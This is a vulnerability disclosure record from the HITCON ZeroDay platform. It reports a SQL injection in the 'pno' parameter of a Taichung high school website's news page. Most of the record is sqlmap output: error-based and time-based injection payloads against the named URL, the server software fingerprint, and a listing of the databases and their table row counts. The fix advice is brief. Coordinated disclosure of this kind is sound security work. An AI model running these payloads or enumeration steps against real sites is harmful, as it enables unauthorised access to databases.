Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00400
- 發信 Vendor: 臺中市資訊教育暨網路中心
- Title: 明台高级中学SQL漏洞
- Introduction: 明台高级中学公告处SQL
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2018/04/06 22:13:22 : 新提交 (由 Cra5h 更新此狀態)
- 2018/04/07 00:26:18 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/07 20:05:56 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/07 20:05:57 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/09 14:48:12 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/27 03:00:14 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-00400
- 通報者:cra5h (Cra5h)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
明太高级中学公告处SQL
SQL位置:
http://www.mths.tc.edu.tw/news_detail.php?pno=1878
pno参数过滤不严导致SQL产生
GET parameter 'pno' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 53 HTTP(s) requests:
Parameter: pno (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: pno=1878 AND (SELECT 9903 FROM(SELECT COUNT(),CONCAT(0x716a717671,(SELECT (ELT(9903=9903,1))),0x7162717871,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pno=1878 AND SLEEP(5)[21:59:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[21:59:48] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[21:59:48] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.mths.tc.edu.tw'
确认影响库:(3个)
available databases [3]:
[] information_schema
[] mths
[*] mths2
[22:00:29] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.mths.tc.edu.tw'
查看数据量:
Database: mths
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| web_d | 1611 |
| web_m2 | 702 |
| contact_us | 173 |
| web_m | 124 |
| manage_functions | 49 |
| manage_area | 29 |
| web_menu | 28 |
| web_class | 13 |
| web_event | 2 |
| language | 1 |
| company_data | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 688 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 277 |
| SESSION_VARIABLES | 277 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| PARTITIONS | 55 |
| TABLES | 55 |
| CHARACTER_SETS | 36 |
| KEY_COLUMN_USAGE | 27 |
| STATISTICS | 27 |
| TABLE_CONSTRAINTS | 27 |
| PROCESSLIST | 20 |
| SCHEMA_PRIVILEGES | 8 |
| PLUGINS | 7 |
| ENGINES | 5 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: mths2
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| web_d | 2374 |
| manage_area | 142 |
| web_menu | 6 |
| language | 1 |
| company_data | 1 |
+---------------------------------------+---------+
[22:01:01] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.mths.tc.edu.tw'
修補建議
过滤,参数化